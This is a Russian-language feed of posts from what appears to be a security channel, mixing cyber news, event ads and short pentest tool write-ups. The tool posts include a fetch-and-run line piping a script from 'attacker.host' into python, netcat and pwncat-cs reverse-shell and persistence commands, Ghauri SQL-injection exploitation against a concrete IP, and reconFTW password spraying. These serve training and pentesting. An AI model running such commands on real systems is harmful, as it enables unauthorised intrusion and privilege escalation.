В 2016 году Илья Лихтенштейн, 35-летний предприниматель российского происхождения, взломал одну из крупнейших криптобирж мира — Bitfinex. Он похитил 120 000 биткоинов, стоимость которых с $70 млн на момент кражи выросла до $10,7 млрд.
✏️ Приговор и сотрудничество с властями
На этой неделе федеральный суд США приговорил Лихтенштейна к 5 годам лишения свободы. Его жена, Хизер Морган, также обвиняется в участии в отмывании украденных средств. Она была вовлечена в процесс без подробных объяснений со стороны Лихтенштейна, а узнала о взломе лишь в 2019 году.
✏️ Лихтенштейн полностью признал свою вину и помог правоохранительным органам вернуть 96% украденных биткоинов, а также предоставил ценную информацию для расследований других киберпреступлений.
Громкая кража и уникальная схема
🔸 Украдено: 120 000 BTC
🔸 Отмыто: ~21% от суммы (около $14 млн)
🔸 Средства перемещались с использованием курьеров из Казахстана и Украины.
🗣️ Сотрудники IRS назвали использованную Лихтенштейном схему отмывания одной из самых сложных, с которыми они сталкивались.
🔴 В новом выпуске подкаста «Безопасно говоря» от экспертов Yandex Cloud вы узнаете, как устроены современные автомобили с точки зрения информационной безопасности и чем занимаются службы ИБ у автопроизводителей.
Слушайте на Яндекс Музыке или YouTube
POODLE — это опасная уязвимость в старом криптографическом протоколе SSL 3.0. Эксплойт позволяет злоумышленникам расшифровывать данные, которые пользователи передают на уязвимых сайтах, и даже захватывать их сессии.
✏️ Что такое SSL и CBC?
SSL (Secure Socket Layer) — протокол, обеспечивающий защищённую передачу данных. Он использует асимметричное шифрование для аутентификации и симметричное для конфиденциальности.
В случае с POODLE наибольшая проблема кроется в режиме шифрования CBC (Cipher Block Chaining), где каждый блок данных зашифрован на основе предыдущего, что создаёт слабое место для потенциальной атаки.
Крутая возможность заявить о себе на VK Security Confab Max
11 декабря 2024 года пройдёт конференция по кибербезопасности — VK Security Confab Max.
Главные темы: SOC, AppSec, защита пользователей, облаков и инфраструктуры.
Программа обещает насыщенный день: технические доклады, нетворкинг, афтепати. Не можете приехать? Будет онлайн-трансляция!
Хочешь выступить? Подавай заявку до 29 ноября ➡️ тут
Новости и детали ➡️ тут
Смотрим в будущее кибербеза на NGENIX ICEBREAKER 2024
Компания NGENIX открывает регистрацию на IV ежегодную конференцию о веб-безопасности, которая пройдет 4 декабря в 11:00, онлайн.
Киберугрозы стремительно прогрессируют. Важно держать руку на пульсе и готовиться к угрозам завтрашнего дня.
Основные темы ICEBREAKER 2024 — защита и обеспечение доступности веб-ресурсов. Умные боты, атаки на API, WAF, импортозамещение, новые инструменты и технологии.
– 3+ часа контента от экспертов NGENIX и лидеров мнений в области ИБ
– 14 докладов разных форматов: технические дискуссии, демо, воркшопы
– экспертный чат с ответами на вопросы зрителей
– презентация новых продуктов и фичей на платформе NGENIX
Присоединяйтесь к ICEBREAKER 2024, чтобы быть в курсе последних трендов в области веб-безопасности /channel/ru_websecurity.
Злоумышленники обладают большими ресурсами и связями с другими группами для проведения масштабных кибератак. Их основная цель – кибершпионаж. Для проникновения в целевую сеть группа активно применяет эксплуатацию публично доступных сервисов на периметре, доступ через подрядчика и легитимные аккаунты.
В одном из расследованных кейсов специалисты наблюдали в журналах следующие запросы:
POST /wsman 443 – 45.12.67.18 HTTP/1.1 Ruby+WinRM+Client+(2.8.3,+ruby+2.7.2+(2020-10-01))
😱 Возможно ли не замечать взлом инфраструктуры пять лет?
К сожалению, да, когда злоумышленник использует тактику Defense Evasion и заметает следы своего присутствия.
В видео расскажем
• Как защищаться от таких техник
• Какие методы обхода средств защиты существуют
• И разберем громкие атаки группировки Lifting Zmiy
Не пропустите выпуск рубрики HACK ATT&CK — защита вашей инфраструктуры начинается здесь!
Для компании утечка данных — это не только риск потери информации, но и серьёзные репутационные и финансовые последствия. Все об утечке данных читайте в новой статье.
🗣️ Когда злоумышленники получают доступ к персональной, финансовой или коммерческой информации, последствия для бизнеса могут быть разрушительными: от потери клиентов до временной остановки бизнес-процессов.
🔄 💻 reconFTW v2.9
Инструмент все в одном для автоматического исследования хоста путем запуска наилучшего набора средств сканирования и обнаружения уязвимостей
🏃♂️ Установка:
git clone https://github.com/six2dez/reconftw
cd reconftw/
./install.sh
./reconftw.sh -d target.com -r
# Single Target
sudo ./reconftw.sh -d target.com -r
# List of Targets
sudo ./reconftw.sh -l sites.txt -r -o /output/directory/
# Yolo mod (all tasks)
sudo ./reconftw.sh -d target.com -a
#Deep scan
./reconftw.sh -d target.com -r --deep -o /output/directory/
# Recon in a multi domain target
./reconftw.sh -m company -l domains_list.txt -r
# Osint
Domain information
Emails addresses and passwords leaks
Metadata finder
API leaks search
# Subdomains
Certificate transparency
NOERROR subdomain discovery
Bruteforce
Permutations
JS files & Source Code Scraping
DNS Records
# Hosts
IP info
CDN checker
WAF checker
Port Scanner
Port services vulnerability checks
Password spraying
Geolocalization info
# Webs
Web Prober
Web screenshoting
Web templates scanner
CMS Scanner
Url extraction
Favicon Real IP
Fuzzing
Wordlist generation
Passwords dictionary creation
# Vulnerability checks
XSS
Open redirect
SSRF
CRLF
Cors
LFI Checks
SQLi Check
SSTI
SSL tests
4XX Bypasser
Теперь данные пользователей на hh.ru защищены ещё лучше.
В знаковый для рынка труда момент HeadHunter объявила о присоединении к Отраслевому стандарту защиты данных, разработанному Ассоциацией больших данных.
Отраслевой стандарт представляет собой свод рекомендаций и практических мер, направленных на установление стандартов для хранения и защиты данных. Он помогает оценить эффективность процессов в системе информационной безопасности и внедрять лучшие практики.
Соглашение было подписано 11 ноября 2024 года в Москве. «Будучи одной из крупнейших платформ по поиску работы, HeadHunter обрабатывает и хранит огромный массив персональных данных», — отметила директор по информационным технологиям и кибербезопасности hh.ru Татьяна Фомина. «Присоединение к стандарту – это подтверждение нашей приверженности защите информации и повышению уровня доверия к платформе».
#новости
На форуме запустили лотерею, где можно выиграть любой курс Академии Кодебай, стартующий в декабре 2024 года. Как только будет разыграно 6 подписок на курс, лотерея будет остановлена. Розыгрыш каждые 3 дня до конца ноября 2024 года.
Нажмите "Купить билет" и выберите 7 цифр, после чего нажмите кнопку "Приобрести".
Быстро заработать на билет можно приглашая участников форума. За каждого реферала начисляем 25 BIT. Ссылка для приглашения находится у вас в профиле форума.
Chisel — это многофункциональная утилита для создания защищенных туннелей TCP/UDP поверх HTTP и HTTPS. Если вам нужно обойти firewall или организовать безопасную точку доступа в сети, Chisel может стать отличным решением. В новой статье разберем подробнее этот инструмент.
🔍 Что такое Chisel и как это работает?
Chisel — это компактное приложение, объединяющее в себе клиент и сервер для туннелирования TCP и UDP трафика. Используя HTTP или HTTPS, Chisel проходит через firewall, маскируясь под стандартный веб-трафик и работая поверх WebSocket. Это позволяет обмениваться данными через часто разрешенные порты (80 или 443), делая трафик менее заметным для фильтров.
❓ Почему это трудно обнаружить?
Chisel отправляет данные в зашифрованных WebSocket фреймах через стандартные порты. Даже глубокая проверка пакетов (DPI) часто не видит, что внутри трафика, так как данные зашифрованы и выглядят как обычная HTTPS-сессия. Это помогает обойти ограничения сети, включая NAT и прокси.
⚙️ Практическое применение Chisel
Для того чтобы разобраться, как это работает, мы проведем небольшой эксперимент с сервером и клиентом на Linux, установим Chisel и настроим туннель. В конце анализа разберем захваченный трафик и посмотрим, как Chisel шифрует его на уровне фреймов.
➡️ Читать подробнее
Исследователи из CloudSEK выявили тревожное обновление в деятельности ботнета Androxgh0st: с начала 2024 года он нацелен на веб-серверы и активно эксплуатирует уязвимости в известных технологиях, таких как Cisco ASA, Atlassian JIRA и различные PHP-фреймворки.
🗣️ Недавний отчет показал, что Androxgh0st теперь использует компоненты от ботнета Mozi, расширяя своё влияние на устройства интернета вещей (IoT) и возможное сотрудничество между двумя ботнетами.
🔥 Это всё меняет!
Positive Technologies 20 ноября запустит PT NGFW. Станьте частью этого масштабного события!
🤟 Два года компания разрабатывала высокопроизводительный и надежный межсетевой экран нового поколения.
Команда прислушивалась к мнению клиентов и партнеров, открыто рассказывала про внутреннюю кухню разработки. Смело бралась за сложные инженерные задачи, уделяла внимание не только коду, но и аппаратной платформе.
В результате они создали совершенное устройство, которое запустят 20 ноября!
👀 На онлайн-запуске вы сможете окунуться в историю создания продукта, узнать, как он защищает от киберугроз, результаты тестирования и завершенных проектов, а также планы на будущее.
Регистрируйтесь на онлайн-запуск заранее на сайте Positive Technologies.
Будем ждать каждого! 🤩
Расширение Hide YouTube Shorts для Chrome после смены владельца стало вредоносным. Вредоносный код был добавлен сразу после смены владельца. В результате чего, плагин начал заниматься мошенничеством с партнёрскими программами и отправлять псевдонимизированные данные пользователей на облачный сервер Amazon. Партнерское мошенничество направлено на генерацию прибыли, используя домен kra18[.]com, который заменяет ссылки на реферальные.
Список некоторых из затронутых популярных расширений:
⏺️Hide YouTube Shorts
⏺️Dynamics 365 Power Pane
⏺️Karma | Online shopping, but better
⏺️Visual Effects for Google Meet
⏺️M3U8 Downloader
Расширения стали вредоносными после передачи прав в середине 2023 года. Особое внимание вызывает расширение Karma.
👀 Вредоносный код в расширениях не был обфусцирован или замаскирован. Каждая часть кода по отдельности выглядит довольно безобидно, но в совокупности внедрённые функции приводят к нелегитимным воздействиям.
❓Зачем Karma Shopping нужны данные о пользователях?
Во-первых, партнёрские комиссии — это их основной вид деятельности и их целью является увеличение числа пользователей. Во-вторых, исходя из политики конфиденциальности компании, сбор данных о посещенных страницах является официальным и Karma утверждает, что продаёт эти данные третьим лицам, для более точного предоставления услуг пользователям.
⚙️ Несмотря на жалобы пользователей Google не реагирует.
Оповещение о проблеме происходит в формате заполнения формы, в которой причинами недовольства расширением служит «не соответствует ожиданиям» или «недружелюбное содержимое». Более точные и детализированные отзывы остаются без ответа.
#новости
💵 Стример потерял $100,000 из-за утечки seed-фразы во время эфира
Англоязычный криптовалютный стример случайно раскрыл свою seed-фразу во время прямой трансляции, что привело к мгновенной утрате $100,000 (около 10 млн рублей).
Ошибка произошла из-за того, что на экране оказалось открыто приложение с заметками, где была сохранена резервная фраза. Злоумышленники тут же воспользовались этой информацией и вывели все средства.
✏️ Seed-фраза — это ключ к вашему криптокошельку. Получив доступ к ней, любой человек может полностью контролировать средства на счёте.
💡 Как избежать таких ситуаций?
🔸Никогда не храните seed-фразу в цифровом формате (особенно на устройствах с выходом в интернет).
🔸Используйте двухфакторную аутентификацию.
🗣️ Это не первый подобный случай. В июле стример Дмитрий Dmitry_Lixxx Лиханов также случайно показал свою seed-фразу в эфире. Хоть часть средств и удалось вернуть, история обошлась ему в немалую сумму.
В киберкриминальном мире появился новый фишинговый инструмент — GoIssue, нацеленный на пользователей GitHub и всю софтверную экосистему. 👀 GoIssue позволяет злоумышленникам собирать email-адреса с профилей GitHub и запускать массовые фишинговые атаки, что повышает риск кражи исходного кода и проникновения в корпоративные сети.
Повышенный риск для GitHub и организаций 🛡
🔸По данным SlashNext, GoIssue представляет собой серьёзную угрозу для разработчиков, использующих GitHub. Захватив учетные данные одного разработчика, злоумышленники могут развернуть атаки на цепочки поставок, создавая уязвимости для всей компании.
🔸Фишинговые кампании, запущенные через GoIssue, могут привести к краже учетных данных, загрузке вредоносного ПО или несанкционированному доступу к приватным репозиториям.
Как работает GoIssue? ⚙️
Инструмент автоматизирует сбор email-адресов с GitHub, используя токены и фильтры по критериям — например, членству в организациях и активности. Затем отправляются фишинговые сообщения, имитирующие уведомления GitHub, которые могут обходить спам-фильтры и попасть прямо в почтовый ящик разработчиков.
Стоимость и доступность GoIssue
GoIssue продается за $700 за индивидуальную версию или $3,000 за полный исходный код, предоставляя анонимность через прокси-сети и позволяя запускать высокотаргетированные фишинговые кампании.
Мнение экспертов:
🗣️ «Появление GoIssue сигнализирует о новой эре, когда платформы для разработчиков становятся полем боя, и защита должна адаптироваться», — прокомментировал Джейсон Сороко из Sectigo.
🗣️ «Не менее важно дать пользователям навыки распознавать подозрительные письма и сообщать о них, а также интегрировать человеческую разведку в центр системы безопасности», — добавил Мика Аалто, сооснователь Hoxhunt.
🚩 Новые задания на платформе Codeby Games!
👩💻 Категория Active Directory — Аноним
🌍 Категория Веб — Провальный код
Приятного хакинга!
В предыдущей статье мы копнули тему линий IRQ и приоритетов IRQL, но чтобы погрузиться в практику, нам нужно ещё немного теории. В мире драйверов WDM всё начинается с понимания базовых объектов драйвера и устройства — с того, что определяет его «скелет» и окружение. Об этом — в новой статье.
⚙️ Схема передачи управления
Система Windows виртуализирует память, разбивая физическую ОЗУ на 4 КБ фреймы, которым назначаются виртуальные адреса. Когда процесс создаётся, система выделяет ему страницы виртуальной памяти, храня ссылки на них в таблицах Page Directory, PDPT, PD, и PT. При этом 48-битный линейный адрес делится на пять частей, где каждый уровень таблиц содержит 512 записей, что в архитектуре x64 позволяет адресовать до 256 ТБ памяти (пополам между ядром и пользователем).
⚙️ DRIVER_OBJECT и DEVICE_OBJECT: Основные элементы драйвера
Что такое драйвер на уровне кода? По сути, это структура DRIVER_OBJECT, где описан весь функционал, который драйвер способен выполнить. Эта структура создаётся диспетчером ввода-вывода Windows, а в нашу функцию инициализации DriverEntry() передаётся лишь указатель на неё.
⚙️ IRP: Пакеты запросов к драйверу
IRP, или Input/Output Request Packet — своего рода джокер в системе запросов. Когда пользователь отправляет команду драйверу (например, DeviceIoControl()
), создаётся IRP, который поступает драйверу через DEVICE_OBJECT->CurrentIrp
. Этот пакет содержит все данные о запросе и предписывает драйверу, что делать дальше. Когда IRP обработан, диспетчер удаляет его, переходя в режим ожидания следующего запроса.
⚙️ Стек драйверов: FDO, PDO и FiDO
Каждое аппаратное устройство в модели WDM работает в связке с двумя типами драйверов: физическим (PDO) и функциональным (FDO). К ним может добавляться фильтрующий драйвер (FiDO), если требуется расширить возможности. Эти драйверы выстраиваются в стек, по которому передаются запросы IRP.
Запросы передаются по стеку сверху вниз: драйвер верхнего уровня обрабатывает IRP и может передать его ниже. Если драйвер FDO решает, что сам справится с запросом, он завершает обработку, отправив команду IoCompleteRequest()
.
✏️ Рекомендуемые команды WinDbg:
🔸 !drvobj
— основная информация по DRIVER_OBJECT
🔸 !devobj
— основные сведения об устройстве DEVICE_OBJECT
🔸 !devstack
— позиция драйвера в стеке
➡️ Читать подробнее
Российский разработчик решений для инфраструктуры, Компания «Базис» представил обновленную версию своего продукта Basis Virtual Security 3.2, в котором более 100 новых функций и улучшений.
✔️ Основные изменения:
🔸 Возможность резервного копирования виртуальных машин. Причем возможность создания резервного копирования возможно как для работающих виртуальных машин, так и для остановленных. Для их хранения возможно использовать NFS-хранилище.
🔸 Доработан графический интерфейс Процесс резервного копирования и восстановления виртуальных машин для администраторов стало удобнее.
🔸 Обновленные инструменты для работы с контролем целостности виртуальных машин и работы с контрольными суммами.
🔸 Обновленные политики целостности. Теперь при нарушении целостности появилась возможность запрета запуска ВМ при нарушении контрольных сумм.
🔸 Появилось журналирование задачи подсчета контрольных сумм, а для их вычислений есть возможность использовать отечественные алгоритмы стандарта ГОСТ Р 34.11 – 2012.
Стоит отметить, что данный продукт получил соответствие требованиям ФСТЭК по 4 уровню доверия (УД4) достаточно быстро. Ранее компания уменьшила срок прохождения испытаний ФСТЭК с 6 месяцев до 3.
Многие трояны в ОС Android довольно примитивны, так как их задачей является лишь перенаправить пользователя на вредоносный сайт при открытии приложения. Однако специалисты из компании Dr.Web обнаружили новый вредонос Android.FakeApp.1669, который отличается использованием модифицированной библиотеки dnsjava.
😳 В настоящий момент варианты троянских программ Android.FakeApp.1669 были загружены через Google Play около 2 160 000 раз!
✏️Среди зараженных приложений можно выделить:
⏺️Split it: Checks and Tips
⏺️FlashPage parser
⏺️BeYummy - your cookbook
⏺️Memogen
⏺️Display Moving Message
⏺️WordCount
🎰 При запуске приложение получает с вредоносного DNS-сервера TXT-запись, содержащую зашифрованную целевую ссылку. Троян загружает её в WebView внутри своего окна поверх основного интерфейса. Ссылка ведет на сайт с длинной цепочкой перенаправлений, конечной точкой которой становится страница онлайн-казино.
❗️При этом сервер отдает TXT-запись только если зараженное устройство подключено к интернету через определенных провайдеров. В остальных случаях приложение предоставляет заявленный разработчиком функционал.
Роскомнадзор работает над созданием национальной системы защиты IР-маршрутизации от внешних угроз. (это следует из Стратегии развития телекоммуникационной отрасли до 2035 г., утвержденной Правительством).
🔑Предполагаем, что речь идет о создании в России инфраструктуры для протокола
▶️RPKI (Resource Public Key Infrastructure/Инфраструктура открытых ключей ресурсов),
решение является расширением протокола
▶️BGP (Border Gateway Protocol/Протокол динамической маршрутизации), отвечающего за динамическую маршрутизацию в интернете.
⚡️Согласно заявлению ведомства, новая система обеспечит надежную защиту российских сетей от атак типа "DDoS", от попыток манипулирования трафиком и подмены IР-адресов.
🆕 Новые технологии, которые планируют внедрить в рамках данного проекта:
⏺️Система раннего обнаружения атак (мониторинг трафика для выявления подозрительной активности и блокирования атак на ранней стадии).
⏺️Централизованная система управления маршрутизацией (повышение устойчивости интернет-инфраструктуры путем распределения трафика и предотвращения перегрузок).
⏺️Система защиты от DNS-подмены (предотвращение подмены DNS-записей, которые могут перенаправлять пользователей на вредоносные сайты).
❗️Проект позволит значительно повысить уровень кибербезопасности в России и обеспечить надежную защиту российских пользователей от внешних угроз.
Участвуй в «Совкомбанк SecureHack» с призовым фондом 300 000 рублей и внеси свой вклад в разработку решения для защиты информационных систем Совкомбанка!
Регистрация на хакатон открыта до 4 декабря включительно: ссылка на регистрацию
Хакатон рассчитан на специалистов уровня Middle и выше — экспертов по информационной безопасности, системных аналитиков, разработчиков и архитекторов ПО с опытом в оценке безопасности. Участвуйте индивидуально или в командах до 3-х человек.
Основная задача — разработать инструмент для оценки безопасности информационных систем банка, который будет полезен как для разработчиков и аналитиков ИБ, так и для проектных менеджеров. Основные требования:
🔹 Принимать на вход различные данные, такие как опросники и карты сетевых доступов.
🔹 Проводить анализ введенных данных для выявления уязвимостей и рисков информационной безопасности.
🔹 Формировать отчет с заключением об уровне безопасности, описанием существующих рисков и рекомендациями по его улучшению.
Вы сможете:
▪️ Побороться за призовой фонд в 300 000 рублей.
▪️ Решить практическую задачу с использованием современных инструментов и подходов к безопасности.
▪️ Расширить свои компетенции и поработать с командой над междисциплинарным проектом.
▪️Показать свои навыки ведущим ИБ-специалистам и получить шанс присоединится к команде Совкомбанк Технологии
Таймлайн хакатона:
🔸 до 4 декабря — регистрация участников
🔸 6 декабря — старт работы над задачей
🔸 15 декабря — завершение загрузки решений
🔸 19 декабря — награждение победителей
Стань автором решения, которое повысит безопасность цифровых сервисов Совкомбанка, и покажи свои способности на практике! Успей зарегистрироваться до 4 декабря: https://cnrlink.com/securehackcodeby
Реклама. ПАО "Совкомбанк". ИНН: 4401116480. erid: LjN8K7KUY
WebTTY
WebTTY – инструмент, обеспечивающий доступ к администрированию удаленных устройств с помощью технологии WebRTC, то есть подключение к другому устройству может происходить без настройки прокси-сервера и наличия открытых портов SSH. Рассмотрим как осуществить удаленное подключение через браузер.
Особенности инструмента:
🔸 Возможность работы WebTTY в браузере, что позволяет обойти защитные меры фаерволла. Подключение происходит через страницу https://maxmcd.github.io/webtty/.
🔸 Шифрование передаваемых данных засчёт использования технологии WebRTC.
🔸 Работа в одностороннем и двухстороннем соединении.
✏️ Принцип работы:
1. На стороне сервера запускается WebTTY, который генерирует необходимые данные для установления WebRTC-соединения (SDP-описание).
2. Данные передаются клиенту, который в свою очередь генерирует свой ответ серверу(оффер).
3. После успешного обмена соединениями клиент получает доступ к командной строке сервера через веб-интерфейс.
Уточнение! Обмен необходимо производить копируя ключи вручную.
Установка и запуск
🔸Скачаем архив и распакуем утилиту с помощью команды:
tar -xvzf webtty_0.5.1_Linux_x86_64.tar.gz
./webtty
🔄😟 GTFONow v 0.3.0
Авто повышение привилегий на .nix подобных системах используя мисконфигурации в setuid/setgid файлах, capabilities и sudo привилегиях.
Разработано специально для CTF, но может использоваться и в реальных условиях. Информацию берет с известного ресурса GTFO
Использование:
python gtfonow.py [OPTIONS]
python gtfonow.py --command 'ls -la' --level 2 --risk 2
curl http://attacker.host/gtfonow.py | python
💻 pwncat-cs v0.5.4
Что не так с netcat ?
Пример классического подключения:
nc 1.1.1.1 4444
remote$ python -c "import pty; pty.spawn('/bin/bash')"
remote$ Ctrl + Z
local$ stty raw -echo
local$ fg
Надоело ? Мне тожеpython3 -m venv pwncat-env
source pwncat-env/bin/activate
pip install pwncat-cs
# Connect to a bind shell
pwncat-cs 10.10.10.10:4444
# Listen for reverse shell
pwncat-cs -lp 4444
# Connect via ssh
pwncat-cs user@10.10.10.10
pwncat-cs user:password@10.10.10.10
pwncat-cs -i id_rsa user@10.10.10.10
# SSH w/ non-standard port
pwncat-cs -p 2222 user@10.10.10.10
pwncat-cs user@10.10.10.10:2222
# Reconnect utilizing installed persistence
# If reconnection fails and no protocol is specified,
# SSH is used as a fallback.
pwncat-cs reconnect://user@10.10.10.10
pwncat-cs reconnect://user@c228fc49e515628a0c13bdc4759a12bf
pwncat-cs user@10.10.10.10
pwncat-cs c228fc49e515628a0c13bdc4759a12bf
Табы работают, по Ctrl + C сессия не рвется.
Переключение между режимами(local <> remote) Ctrl + D
Есть полезные фичи как Upload с хоста на жертву, так и наоборот Download.
Модули escalate и enumerate для ленивых
run enumerate types=file.suid
run enumerate
🚩 Новые задания на платформе Codeby Games!
🔑 Категория Криптография — Широковещание
🔎 Категория OSINT — Кого ищем?
Приятного хакинга!
🤖 PentestGPT - это инструмент тестирования на проникновение, предоставляемый ChatGPT. Он предназначен для автоматизации процесса тестирования на проникновение. Он построен на основе ChatGPT и работает в интерактивном режиме. Данная утилита способна самостоятельно решать легкие и средние машины на HTB
🔸 Установка утилиты
pip3 install git+https://github.com/GreyDGL/PentestGPT
shell export OPENAI_API_KEY='<your key here>'
pentestgpt-connection
pentestgpt --reasoning_model=gpt-4-turbo
🔄 💻 Ghauri v1.3.8
🔺 Продвинутый кроссплатформенный инструмент, автоматизирующий процесс обнаружения и эксплуатации 🔥 SQL-инъекций.
Поддерживаемые техники:
Boolean based
Error Based
Time Based
Stacked Queries
MySQL
Microsoft SQL Server
Postgres
Oracle
GET/POST
Headers
Cookies
Mulitipart Form data
JSON
SOAP/XML
--sql-shell
--proxy
git clone https://github.com/r0oth3x49/ghauri.gitЧитать полностью…
python3 -m pip install --upgrade -r requirements.txt
python3 setup.py install
ghauri -u 'http://62.173.140.174:16015/user.php?login=asd&password=asd' --batch -v 2 --dbs
Уважаемые клиенты, ввиду блокировки Cloudflare часть наших сайтов временно недоступна без VPN. В том числе и codeby.school. Наши инженеры в курсе проблемы и обещают ее решить в течение часа.
Читать полностью…